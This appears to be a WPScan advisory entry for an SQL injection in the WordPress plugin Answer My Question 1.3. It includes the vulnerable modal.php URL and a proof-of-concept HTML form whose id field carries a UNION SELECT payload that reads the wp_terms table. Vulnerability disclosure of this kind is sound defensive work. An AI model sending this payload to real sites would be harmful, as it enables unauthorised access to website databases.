Answer My Question 1.3 - SQL Injection

Description

$_POST['id'] is not escaped. Url is accessible for any user.
Url vulnerable : http://target/wp-content/plugins/answer-my-question/modal.php

Proof of Concept

<form method="post" action="http://target/wp-content/plugins/answer-my-question/modal.php">
    <input type="text" name="id" value="0 UNION SELECT 1,2,3,4,5,6,slug,term_group,name,10,11,12 FROM wp_terms WHERE term_id=1">
    <input type="submit" value="Send">
</form>

Affects Plugin

answer-my-question

References

EXPLOITDB	40771
URL	http://lenonleite.com.br/en/blog/2016/11/11/answer-my-question-1-3-plugin-for-wordpress-sql-injection/

Classification

Type	SQLI
OWASP Top 10	A1: Injection
CWE	CWE-89

Miscellaneous

Submitter	Lenon Leite
Submitter Website	http://lenonleite.com.br/en/
Submitter Twitter	lenonleite
Views	804
Verified	No
WPVDB ID	8669

Timeline

Publicly Published	2016-11-17 (about 2 years ago)
Added	2016-11-21 (almost 2 years ago)
Last Updated	2016-11-21 (almost 2 years ago)

Copyright & License

Copyright	All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License	Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.